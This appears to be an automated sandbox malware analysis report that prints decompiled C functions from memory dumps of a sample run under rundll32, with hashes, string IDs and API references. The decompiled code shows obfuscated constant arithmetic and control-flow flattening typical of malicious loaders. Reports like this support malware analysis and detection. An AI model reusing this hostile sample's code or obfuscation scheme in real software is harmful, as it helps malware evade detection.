                                                                                                                    0x00338840
                                                                                                                    0x00338842
                                                                                                                    0x0033885d
                                                                                                                    0x00338844
                                                                                                                    0x00338844
                                                                                                                    0x00338814
                                                                                                                    0x00338818
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00338818
                                                                                                                    0x00000000
                                                                                                                    0x00338842
                                                                                                                    0x00338814
                                                                                                                    0x00338868
                                                                                                                    0x00338868
                                                                                                                    0x0033886a
                                                                                                                    0x0033888d
                                                                                                                    0x00338892
                                                                                                                    0x00000000
                                                                                                                    0x0033886c
                                                                                                                    0x00338870
                                                                                                                    0x0033887d
                                                                                                                    0x00338883
                                                                                                                    0x00000000
                                                                                                                    0x00338883
                                                                                                                    0x00000000
                                                                                                                    0x00338692
                                                                                                                    0x00338698
                                                                                                                    0x003387b9
                                                                                                                    0x003387be
                                                                                                                    0x003387c0
                                                                                                                    0x003387c3
                                                                                                                    0x003387c6
                                                                                                                    0x003387cc
                                                                                                                    0x00338679
                                                                                                                    0x00338679
                                                                                                                    0x00338679
                                                                                                                    0x00000000
                                                                                                                    0x00338679
                                                                                                                    0x00338679
                                                                                                                    0x0033869e
                                                                                                                    0x003386a4
                                                                                                                    0x0033874a
                                                                                                                    0x00338765
                                                                                                                    0x0033876a
                                                                                                                    0x0033876c
                                                                                                                    0x00338771
                                                                                                                    0x00338776
                                                                                                                    0x00338679
                                                                                                                    0x00338679
                                                                                                                    0x00338679
                                                                                                                    0x00000000
                                                                                                                    0x00338679
                                                                                                                    0x003386aa
                                                                                                                    0x003386b0
                                                                                                                    0x003386ff
                                                                                                                    0x0033870e
                                                                                                                    0x0033870f
                                                                                                                    0x00338710
                                                                                                                    0x0033871a
                                                                                                                    0x0033871c
                                                                                                                    0x00338722
                                                                                                                    0x00338729
                                                                                                                    0x00000000
                                                                                                                    0x003386b2
                                                                                                                    0x003386b8
                                                                                                                    0x003386f4
                                                                                                                    0x00000000
                                                                                                                    0x003386ba
                                                                                                                    0x003386c0
                                                                                                                    0x003388b2
                                                                                                                    0x003388b2
                                                                                                                    0x003388b8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x003388be
                                                                                                                    0x003386c6
                                                                                                                    0x003386dd
                                                                                                                    0x003386e2
                                                                                                                    0x003386c0
                                                                                                                    0x003386b8
                                                                                                                    0x003386b0
                                                                                                                    0x003386a4
                                                                                                                    0x00338698
                                                                                                                    0x003386f1
                                                                                                                    0x00000000
                                                                                                                    0x003386f1
                                                                                                                    0x003388a2
                                                                                                                    0x003388a8
                                                                                                                    0x003388ad
                                                                                                                    0x00000000
                                                                                                                    0x003388ad

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: Q$/&X$Lz$N'`$S,I$Ze$q_
                                                                                                                    • API String ID: 0-1837206032
                                                                                                                    • Opcode ID: a97af903b3b5f26ab8fc4ba086fa37fc7b7a3e50b49edb494cc1a9cb632abf43
                                                                                                                    • Instruction ID: 682e604ca13c265c5465ed233bd06b0b719f46aaee856834a749a2784d1bde56
                                                                                                                    • Opcode Fuzzy Hash: a97af903b3b5f26ab8fc4ba086fa37fc7b7a3e50b49edb494cc1a9cb632abf43
                                                                                                                    • Instruction Fuzzy Hash: 810222711083809FD369CF25C48AA5FBBE1FBC4758F508A1DF69A8A260D7B49949CF43
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 96%
                                                                                                                    			E0033E5CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                    				char _v44;
                                                                                                                    				signed int _v48;
                                                                                                                    				signed int _v52;
                                                                                                                    				signed int _v56;
                                                                                                                    				signed int _v60;
                                                                                                                    				signed int _v64;
                                                                                                                    				signed int _v68;
                                                                                                                    				signed int _v72;
                                                                                                                    				signed int _v76;
                                                                                                                    				signed int _v80;
                                                                                                                    				signed int _v84;
                                                                                                                    				signed int _v88;
                                                                                                                    				signed int _v92;
                                                                                                                    				signed int _v96;
                                                                                                                    				signed int _v100;
                                                                                                                    				signed int _v104;
                                                                                                                    				signed int _v108;
                                                                                                                    				signed int _v112;
                                                                                                                    				signed int _v116;
                                                                                                                    				void* _t170;
                                                                                                                    				void* _t181;
                                                                                                                    				void* _t184;
                                                                                                                    				void* _t189;
                                                                                                                    				void* _t192;
                                                                                                                    				void* _t195;
                                                                                                                    				void* _t197;
                                                                                                                    				void* _t220;
                                                                                                                    				signed int _t221;
                                                                                                                    				signed int _t222;
                                                                                                                    				signed int _t223;
                                                                                                                    				signed int* _t226;
                                                                                                                    
                                                                                                                    				_push(_a8);
                                                                                                                    				_t219 = _a4;
                                                                                                                    				_t195 = __ecx;
                                                                                                                    				_push(_a4);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t170);
                                                                                                                    				_v56 = 0xa4c651;
                                                                                                                    				_t226 =  &(( &_v116)[4]);
                                                                                                                    				_v56 = _v56 ^ 0x6a6d8bac;
                                                                                                                    				_v56 = _v56 ^ 0x6ac6bd64;
                                                                                                                    				_t220 = 0;
                                                                                                                    				_v60 = 0xbac055;
                                                                                                                    				_t197 = 0xf39239f;
                                                                                                                    				_v60 = _v60 << 0xd;
                                                                                                                    				_v60 = _v60 ^ 0x580542e6;
                                                                                                                    				_v108 = 0xd580f5;
                                                                                                                    				_v108 = _v108 ^ 0x97cdda0d;
                                                                                                                    				_v108 = _v108 + 0x37dd;
                                                                                                                    				_v108 = _v108 >> 0xe;
                                                                                                                    				_v108 = _v108 ^ 0x00021113;
                                                                                                                    				_v52 = 0xf28435;
                                                                                                                    				_v52 = _v52 | 0x057a1a90;
                                                                                                                    				_v52 = _v52 ^ 0x05fdc129;
                                                                                                                    				_v80 = 0x5c8bc8;
                                                                                                                    				_t221 = 0x27;
                                                                                                                    				_v80 = _v80 / _t221;
                                                                                                                    				_t222 = 0x1b;
                                                                                                                    				_v80 = _v80 * 9;
                                                                                                                    				_v80 = _v80 ^ 0x0013f028;
                                                                                                                    				_v96 = 0x281d9a;
                                                                                                                    				_v96 = _v96 + 0xffff8f77;
                                                                                                                    				_v96 = _v96 + 0x4719;
                                                                                                                    				_v96 = _v96 << 0xf;
                                                                                                                    				_v96 = _v96 ^ 0xfa152b1c;
                                                                                                                    				_v112 = 0x7415d8;
                                                                                                                    				_v112 = _v112 >> 0xf;
                                                                                                                    				_v112 = _v112 + 0xfffff76c;
                                                                                                                    				_v112 = _v112 >> 0xd;
                                                                                                                    				_v112 = _v112 ^ 0x000d779a;
                                                                                                                    				_v88 = 0xb68707;
                                                                                                                    				_v88 = _v88 ^ 0x45e0ecf4;
                                                                                                                    				_v88 = _v88 + 0xffff71c0;
                                                                                                                    				_v88 = _v88 ^ 0x455519c2;
                                                                                                                    				_v116 = 0xceabf6;
                                                                                                                    				_v116 = _v116 + 0x1225;
                                                                                                                    				_v116 = _v116 / _t222;
                                                                                                                    				_v116 = _v116 >> 6;
                                                                                                                    				_v116 = _v116 ^ 0x0006e3bb;
                                                                                                                    				_v84 = 0xd525a4;
                                                                                                                    				_v84 = _v84 + 0xffff1243;
                                                                                                                    				_v84 = _v84 + 0x1c30;
                                                                                                                    				_v84 = _v84 ^ 0x00df7efc;
                                                                                                                    				_v100 = 0xf29ecf;
                                                                                                                    				_v100 = _v100 << 0xc;
                                                                                                                    				_v100 = _v100 + 0xffff4e95;
                                                                                                                    				_v100 = _v100 ^ 0x70d6065d;
                                                                                                                    				_v100 = _v100 ^ 0x593d89f0;
                                                                                                                    				_v104 = 0x2206c6;
                                                                                                                    				_v104 = _v104 | 0x38687435;
                                                                                                                    				_v104 = _v104 ^ 0xadcf411b;
                                                                                                                    				_v104 = _v104 ^ 0x9549ac77;
                                                                                                                    				_v104 = _v104 ^ 0x00e3f730;
                                                                                                                    				_v92 = 0xd38a43;
                                                                                                                    				_v92 = _v92 >> 3;
                                                                                                                    				_v92 = _v92 + 0x6fd1;
                                                                                                                    				_v92 = _v92 ^ 0x0012c73c;
                                                                                                                    				_v64 = 0x625266;
                                                                                                                    				_v64 = _v64 + 0x2436;
                                                                                                                    				_v64 = _v64 ^ 0x006987c3;
                                                                                                                    				_v68 = 0xe296bd;
                                                                                                                    				_v68 = _v68 << 0xd;
                                                                                                                    				_v68 = _v68 ^ 0x52d9a139;
                                                                                                                    				_v72 = 0x54a2fd;
                                                                                                                    				_v72 = _v72 << 0xd;
                                                                                                                    				_v72 = _v72 >> 0xa;
                                                                                                                    				_v72 = _v72 ^ 0x002b3e4c;
                                                                                                                    				_v76 = 0x32cdcd;
                                                                                                                    				_v76 = _v76 << 0xb;
                                                                                                                    				_t223 = 0x32;
                                                                                                                    				_v76 = _v76 / _t223;
                                                                                                                    				_v76 = _v76 ^ 0x0302c408;
                                                                                                                    				_v48 = 0x2d2164;
                                                                                                                    				_v48 = _v48 + 0xfffff0e0;
                                                                                                                    				_v48 = _v48 ^ 0x0021ab5a;
                                                                                                                    				do {
                                                                                                                    					while(_t197 != 0x2168849) {
                                                                                                                    						if(_t197 == 0x29fa3de) {
                                                                                                                    							_t184 = E00332A21(_v84, _v100,  &_v44, _t219 + 0x20, _v104);
                                                                                                                    							_t226 =  &(_t226[3]);
                                                                                                                    							__eflags = _t184;
                                                                                                                    							if(__eflags != 0) {
                                                                                                                    								_t197 = 0x74ac459;
                                                                                                                    								continue;
                                                                                                                    							}
                                                                                                                    						} else {
                                                                                                                    							if(_t197 == 0x545de14) {
                                                                                                                    								E00333DBC( &_v44, _t195, _v56, _v60, _v108);
                                                                                                                    								_t226 =  &(_t226[3]);
                                                                                                                    								_t197 = 0x2168849;
                                                                                                                    								continue;
                                                                                                                    							} else {
                                                                                                                    								if(_t197 == 0x6ab10c5) {
                                                                                                                    									_t189 = E00332A21(_v112, _v88,  &_v44, _t219 + 0x1c, _v116);
                                                                                                                    									_t226 =  &(_t226[3]);
                                                                                                                    									__eflags = _t189;
                                                                                                                    									if(__eflags != 0) {
                                                                                                                    										_t197 = 0x29fa3de;
                                                                                                                    										continue;
                                                                                                                    									}
                                                                                                                    								} else {
                                                                                                                    									if(_t197 == 0x74ac459) {
                                                                                                                    										_t192 = E00332A21(_v92, _v64,  &_v44, _t219 + 0x28, _v68);
                                                                                                                    										_t226 =  &(_t226[3]);
                                                                                                                    										__eflags = _t192;
                                                                                                                    										if(__eflags != 0) {
                                                                                                                    											_t197 = 0x9dbfb8a;
                                                                                                                    											continue;
                                                                                                                    										}
                                                                                                                    									} else {
                                                                                                                    										if(_t197 == 0x9dbfb8a) {
                                                                                                                    											__eflags = E0034D97D( &_v44, _v72, __eflags, _v76, _t219 + 4, _v48);
                                                                                                                    											_t220 =  !=  ? 1 : _t220;
                                                                                                                    											__eflags = _t220;
                                                                                                                    										} else {
                                                                                                                    											if(_t197 != 0xf39239f) {
                                                                                                                    												goto L19;
                                                                                                                    											} else {
                                                                                                                    												_t197 = 0x545de14;
                                                                                                                    												continue;
                                                                                                                    											}
                                                                                                                    										}
                                                                                                                    									}
                                                                                                                    								}
                                                                                                                    							}
                                                                                                                    						}
                                                                                                                    						L22:
                                                                                                                    						return _t220;
                                                                                                                    					}
                                                                                                                    					_t181 = E00332A21(_v52, _v80,  &_v44, _t219 + 0x14, _v96);
                                                                                                                    					_t226 =  &(_t226[3]);
                                                                                                                    					__eflags = _t181;
                                                                                                                    					if(__eflags == 0) {
                                                                                                                    						_t197 = 0x90a774d;
                                                                                                                    						goto L19;
                                                                                                                    					} else {
                                                                                                                    						_t197 = 0x6ab10c5;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					goto L22;
                                                                                                                    					L19:
                                                                                                                    					__eflags = _t197 - 0x90a774d;
                                                                                                                    				} while (__eflags != 0);
                                                                                                                    				goto L22;
                                                                                                                    			}


































                                                                                                                    0x0033e984
                                                                                                                    0x0033e86b
                                                                                                                    0x0033e871
                                                                                                                    0x00000000
                                                                                                                    0x0033e877
                                                                                                                    0x0033e877
                                                                                                                    0x00000000
                                                                                                                    0x0033e877
                                                                                                                    0x0033e871
                                                                                                                    0x0033e865
                                                                                                                    0x0033e85d
                                                                                                                    0x0033e855
                                                                                                                    0x0033e849
                                                                                                                    0x0033e988
                                                                                                                    0x0033e990
                                                                                                                    0x0033e990
                                                                                                                    0x0033e93a
                                                                                                                    0x0033e93f
                                                                                                                    0x0033e942
                                                                                                                    0x0033e944
                                                                                                                    0x0033e950
                                                                                                                    0x00000000
                                                                                                                    0x0033e946
                                                                                                                    0x0033e946
                                                                                                                    0x00000000
                                                                                                                    0x0033e946
                                                                                                                    0x00000000
                                                                                                                    0x0033e955
                                                                                                                    0x0033e955
                                                                                                                    0x0033e955
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5th8$6$$L>+$Mw$Mw$d!-$fRb
                                                                                                                    • API String ID: 0-2045295228
                                                                                                                    • Opcode ID: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                    • Instruction ID: b89f70d364ea173917348e4f8902f59fff3c32b2d4d364ff78fe37c8807005f7
                                                                                                                    • Opcode Fuzzy Hash: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                    • Instruction Fuzzy Hash: 229175B25083419BC799CE61C88951BFBF5FBD4758F004A1DF58296260D7B1DA19CF83
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 92%
                                                                                                                    			E0033E2CC(void* __edx, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                    				char _v556;
                                                                                                                    				intOrPtr _v576;
                                                                                                                    				char _v600;
                                                                                                                    				signed int _v604;
                                                                                                                    				signed int _v608;
                                                                                                                    				signed int _v612;
                                                                                                                    				signed int _v616;
                                                                                                                    				signed int _v620;
                                                                                                                    				signed int _v624;
                                                                                                                    				signed int _v628;
                                                                                                                    				signed int _v632;
                                                                                                                    				signed int _v636;
                                                                                                                    				signed int _v640;
                                                                                                                    				signed int _v644;
                                                                                                                    				signed int _v648;
                                                                                                                    				signed int _v652;
                                                                                                                    				void* __ecx;
                                                                                                                    				void* _t136;
                                                                                                                    				void* _t151;
                                                                                                                    				signed int _t153;
                                                                                                                    				signed int _t156;
                                                                                                                    				void* _t162;
                                                                                                                    				signed int _t167;
                                                                                                                    				intOrPtr _t187;
                                                                                                                    				signed int _t188;
                                                                                                                    				signed int _t189;
                                                                                                                    				signed int _t190;
                                                                                                                    				signed int _t191;
                                                                                                                    				signed int _t192;
                                                                                                                    				signed int* _t196;
                                                                                                                    
                                                                                                                    				_push(_a12);
                                                                                                                    				_t187 = _a8;
                                                                                                                    				_push(_t187);
                                                                                                                    				_push(E00338E4D);
                                                                                                                    				_push(__edx);
                                                                                                                    				E003420B9(_t136);
                                                                                                                    				_v608 = 0x1ac257;
                                                                                                                    				_t196 =  &(( &_v652)[5]);
                                                                                                                    				_v608 = _v608 ^ 0x78a3296c;
                                                                                                                    				_v608 = _v608 ^ 0x78b9eb39;
                                                                                                                    				_t162 = 0xac58df2;
                                                                                                                    				_v624 = 0x387e66;
                                                                                                                    				_t9 =  &_v624; // 0x387e66
                                                                                                                    				_t188 = 0x2e;
                                                                                                                    				_v624 =  *_t9 * 0x13;
                                                                                                                    				_v624 = _v624 / _t188;
                                                                                                                    				_v624 = _v624 ^ 0x001972d5;
                                                                                                                    				_v644 = 0x433552;
                                                                                                                    				_v644 = _v644 + 0xffffa6b6;
                                                                                                                    				_v644 = _v644 ^ 0x94defa20;
                                                                                                                    				_v644 = _v644 << 1;
                                                                                                                    				_v644 = _v644 ^ 0x293db944;
                                                                                                                    				_v652 = 0xb70b59;
                                                                                                                    				_v652 = _v652 << 0xb;
                                                                                                                    				_v652 = _v652 + 0xffff8138;
                                                                                                                    				_t189 = 0x15;
                                                                                                                    				_v652 = _v652 / _t189;
                                                                                                                    				_v652 = _v652 ^ 0x08c5a62f;
                                                                                                                    				_v616 = 0xf4782f;
                                                                                                                    				_v616 = _v616 >> 0xa;
                                                                                                                    				_v616 = _v616 + 0xffff066a;
                                                                                                                    				_v616 = _v616 ^ 0xfff8c7bc;
                                                                                                                    				_v604 = 0x656560;
                                                                                                                    				_v604 = _v604 >> 3;
                                                                                                                    				_v604 = _v604 ^ 0x0000606f;
                                                                                                                    				_v648 = 0x377d9b;
                                                                                                                    				_t190 = 0x7f;
                                                                                                                    				_v648 = _v648 / _t190;
                                                                                                                    				_v648 = _v648 + 0xfd7f;
                                                                                                                    				_v648 = _v648 + 0xffff6b0a;
                                                                                                                    				_v648 = _v648 ^ 0x00006649;
                                                                                                                    				_v636 = 0x80cedd;
                                                                                                                    				_t191 = 0x58;
                                                                                                                    				_v636 = _v636 / _t191;
                                                                                                                    				_v636 = _v636 + 0x515e;
                                                                                                                    				_v636 = _v636 ^ 0x000b92de;
                                                                                                                    				_v620 = 0x65d9bd;
                                                                                                                    				_v620 = _v620 + 0xffff4b50;
                                                                                                                    				_v620 = _v620 ^ 0xd34cfccc;
                                                                                                                    				_v620 = _v620 ^ 0xd32e4bd2;
                                                                                                                    				_v632 = 0xb89e86;
                                                                                                                    				_v632 = _v632 + 0xffffcc79;
                                                                                                                    				_t192 = 0x2f;
                                                                                                                    				_v632 = _v632 / _t192;
                                                                                                                    				_v632 = _v632 ^ 0x00046a67;
                                                                                                                    				_v628 = 0xbb1c4a;
                                                                                                                    				_v628 = _v628 >> 6;
                                                                                                                    				_v628 = _v628 >> 9;
                                                                                                                    				_v628 = _v628 ^ 0x000a4ee8;
                                                                                                                    				_v640 = 0xfd7114;
                                                                                                                    				_v640 = _v640 << 5;
                                                                                                                    				_v640 = _v640 * 0x45;
                                                                                                                    				_v640 = _v640 + 0xa2ea;
                                                                                                                    				_v640 = _v640 ^ 0x89e0c310;
                                                                                                                    				_v612 = 0x26e293;
                                                                                                                    				_v612 = _v612 >> 0xd;
                                                                                                                    				_v612 = _v612 ^ 0x00050986;
                                                                                                                    				_t193 = _v612;
                                                                                                                    				do {
                                                                                                                    					while(_t162 != 0x249e110) {
                                                                                                                    						if(_t162 == 0x48c9d54) {
                                                                                                                    							_v556 = 0x22c;
                                                                                                                    							_t153 = E0034C15D(_t193, _v652, _v616,  &_v556, _v604);
                                                                                                                    							_t196 =  &(_t196[3]);
                                                                                                                    							asm("sbb ecx, ecx");
                                                                                                                    							_t167 =  ~_t153 & 0xf758a92f;
                                                                                                                    							L13:
                                                                                                                    							_t162 = _t167 + 0xe63f1a5;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						if(_t162 == 0x5bc9ad4) {
                                                                                                                    							_t156 = E00338E4D( &_v556,  &_v600);
                                                                                                                    							asm("sbb ecx, ecx");
                                                                                                                    							_t167 =  ~_t156 & 0xf3e5ef6b;
                                                                                                                    							goto L13;
                                                                                                                    						}
                                                                                                                    						if(_t162 == 0xac58df2) {
                                                                                                                    							_v576 = _t187;
                                                                                                                    							_t162 = 0xcf1a497;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						if(_t162 != 0xcf1a497) {
                                                                                                                    							if(_t162 == 0xe63f1a5) {
                                                                                                                    								return E00341E67(_v632, _v628, _v640, _v612, _t193);
                                                                                                                    							}
                                                                                                                    							goto L18;
                                                                                                                    						}
                                                                                                                    						_push(_t162);
                                                                                                                    						_t156 = E00335988(_t162, _v608);
                                                                                                                    						_t193 = _t156;
                                                                                                                    						if(_t156 != 0xffffffff) {
                                                                                                                    							_t162 = 0x48c9d54;
                                                                                                                    							continue;
                                                                                                                    						}
                                                                                                                    						L8:
                                                                                                                    						return _t156;
                                                                                                                    					}
                                                                                                                    					_t151 = E00332A58(_v648, _t193,  &_v556, _v636, _v620);
                                                                                                                    					_t196 =  &(_t196[3]);
                                                                                                                    					if(_t151 == 0) {
                                                                                                                    						_t162 = 0xe63f1a5;
                                                                                                                    						goto L18;
                                                                                                                    					} else {
                                                                                                                    						_t162 = 0x5bc9ad4;
                                                                                                                    						continue;
                                                                                                                    					}
                                                                                                                    					goto L8;
                                                                                                                    					L18:
                                                                                                                    				} while (_t162 != 0xad68edc);
                                                                                                                    				return _t156;
                                                                                                                    			}

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: If$R5C$^Q$`ee$f~8$o`$N
                                                                                                                    • API String ID: 0-3572798563
                                                                                                                    • Opcode ID: 84ff12e26efdb68cf03f03849009ad08719321799c73013c5df2b8f256c0be86
                                                                                                                    • Instruction ID: 04efce24e3e1b9f84c399c2abe68ee4c4a16203eaa30530acbcc8eed8f3ef9a2
                                                                                                                    • Opcode Fuzzy Hash: 84ff12e26efdb68cf03f03849009ad08719321799c73013c5df2b8f256c0be86
                                                                                                                    • Instruction Fuzzy Hash: 8D717572508301DFD359CF22C88985FBBE1EBC4768F504A1DF5969A2A0D775CA49CF82
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    APIs
                                                                                                                    • _strcpy_s.LIBCMT ref: 10014B9E
                                                                                                                      • Part of subcall function 100311F4: __getptd_noexit.LIBCMT ref: 100311F4
                                                                                                                    • __snprintf_s.LIBCMT ref: 10014BD7
                                                                                                                      • Part of subcall function 1003119A: __vsnprintf_s_l.LIBCMT ref: 100311AF
                                                                                                                    • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 10014C02
                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 10014C25
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494812267.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494803418.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494843053.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494850475.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494855321.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                    • Associated: 00000009.00000002.494860676.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLibraryLoadLocale__getptd_noexit__snprintf_s__vsnprintf_s_l_strcpy_s
                                                                                                                    • String ID: LOC
                                                                                                                    • API String ID: 3864805678-519433814
                                                                                                                    • Opcode ID: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                    • Instruction ID: c6b9acf05ba5f485c5c472c95a6cc1a1d49ea65b07ecc8430683ae88ba63382e
                                                                                                                    • Opcode Fuzzy Hash: 993ef955d11e1d056c0da4e243e940ae0abcf9c49e17b7ca6a81ba24efbb4c92
                                                                                                                    • Instruction Fuzzy Hash: B011E471900118AFDB11DB64CC86BDD73B8EF09315F1241A1F7059F0A1EEB0E9859AD1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 94%
                                                                                                                    			E0033CF47(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr _a20) {
                                                                                                                    				char _v32;
                                                                                                                    				intOrPtr _v40;
                                                                                                                    				intOrPtr _v52;
                                                                                                                    				intOrPtr _v56;
                                                                                                                    				intOrPtr _v88;
                                                                                                                    				char* _v92;
                                                                                                                    				char _v112;
                                                                                                                    				char _v120;
                                                                                                                    				intOrPtr _v124;
                                                                                                                    				char _v128;
                                                                                                                    				signed int _v132;
                                                                                                                    				signed int _v136;
                                                                                                                    				signed int _v140;
                                                                                                                    				signed int _v144;
                                                                                                                    				signed int _v148;
                                                                                                                    				signed int _v152;
                                                                                                                    				signed int _v156;
                                                                                                                    				signed int _v160;
                                                                                                                    				signed int _v164;
                                                                                                                    				signed int _v168;
                                                                                                                    				signed int _v172;
                                                                                                                    				signed int _v176;
                                                                                                                    				signed int _v180;
                                                                                                                    				signed int _v184;
                                                                                                                    				signed int _v188;
                                                                                                                    				signed int _v192;
                                                                                                                    				signed int _v196;
                                                                                                                    				signed int _v200;
                                                                                                                    				signed int _v204;
                                                                                                                    				signed int _v208;
                                                                                                                    				signed int _v212;
                                                                                                                    				signed int _v216;
                                                                                                                    				signed int _v220;
                                                                                                                    				signed int _v224;
                                                                                                                    				signed int _v228;
                                                                                                                    				signed int _v232;
                                                                                                                    				signed int _v236;
                                                                                                                    				signed int _v240;
                                                                                                                    				signed int _v244;
                                                                                                                    				signed int _v248;
                                                                                                                    				signed int _v252;
                                                                                                                    				signed int _v256;
                                                                                                                    				signed int _v260;
                                                                                                                    				signed int _v264;
                                                                                                                    				signed int _v268;
                                                                                                                    				void* _t345;
                                                                                                                    				void* _t377;
                                                                                                                    				void* _t378;
                                                                                                                    				void* _t386;
                                                                                                                    				void* _t393;
                                                                                                                    				intOrPtr _t403;
                                                                                                                    				intOrPtr* _t406;
                                                                                                                    				void* _t408;
                                                                                                                    				signed char* _t414;
                                                                                                                    				signed char* _t450;
                                                                                                                    				intOrPtr* _t455;
                                                                                                                    				intOrPtr _t456;
                                                                                                                    				intOrPtr _t457;
                                                                                                                    				void* _t458;
                                                                                                                    				signed char* _t459;
                                                                                                                    				signed int _t460;
                                                                                                                    				signed int _t461;
                                                                                                                    				signed int _t462;
                                                                                                                    				signed int _t463;
                                                                                                                    				signed int _t464;
                                                                                                                    				signed int _t465;
                                                                                                                    				signed int _t466;
                                                                                                                    				signed int _t467;
                                                                                                                    				signed int _t468;
                                                                                                                    				signed int _t469;
                                                                                                                    				void* _t470;
                                                                                                                    				void* _t471;
                                                                                                                    				void* _t474;
                                                                                                                    
                                                                                                                    				_t406 = _a8;
                                                                                                                    				_t456 = _a4;
                                                                                                                    				_push(_a20);
                                                                                                                    				_t455 = _a16;
                                                                                                                    				_push(_t455);
                                                                                                                    				_push(_a12);
                                                                                                                    				_push(_t406);
                                                                                                                    				_push(_t456);
                                                                                                                    				_push(__edx);
                                                                                                                    				_push(__ecx);
                                                                                                                    				E003420B9(_t345);
                                                                                                                    				_v256 = 0xcf1dac;
                                                                                                                    				_t471 = _t470 + 0x1c;
                                                                                                                    				_v256 = _v256 ^ 0x662b1d0f;
                                                                                                                    				_v256 = _v256 << 2;
                                                                                                                    				_t408 = 0x8e80a37;
                                                                                                                    				_v256 = _v256 + 0xffff9089;
                                                                                                                    				_v256 = _v256 ^ 0x9b8f9315;
                                                                                                                    				_v160 = 0x25617a;
                                                                                                                    				_v160 = _v160 << 2;
                                                                                                                    				_v160 = _v160 ^ 0x009585a8;
                                                                                                                    				_v264 = 0x39e017;
                                                                                                                    				_v264 = _v264 + 0xffffbc9c;
                                                                                                                    				_v264 = _v264 ^ 0xb11c7ead;
                                                                                                                    				_v264 = _v264 + 0xffffd7b2;
                                                                                                                    				_v264 = _v264 ^ 0xb125b990;
                                                                                                                    				_v240 = 0xb82586;
                                                                                                                    				_t460 = 0x74;
                                                                                                                    				_v240 = _v240 / _t460;
                                                                                                                    				_v240 = _v240 << 1;
                                                                                                                    				_t461 = 0x3b;
                                                                                                                    				_v132 = _v132 & 0x00000000;
                                                                                                                    				_v240 = _v240 * 0x36;
                                                                                                                    				_v240 = _v240 ^ 0x00aace1a;
                                                                                                                    				_v180 = 0xcab8fe;
                                                                                                                    				_v180 = _v180 ^ 0xca9451c5;
                                                                                                                    				_v180 = _v180 | 0x3e03c42f;
                                                                                                                    				_v180 = _v180 ^ 0xfe5c53ad;
                                                                                                                    				_v248 = 0x57862;
                                                                                                                    				_v248 = _v248 | 0x3f7dcfba;
                                                                                                                    				_v248 = _v248 / _t461;
                                                                                                                    				_t462 = 0x62;
                                                                                                                    				_v248 = _v248 / _t462;
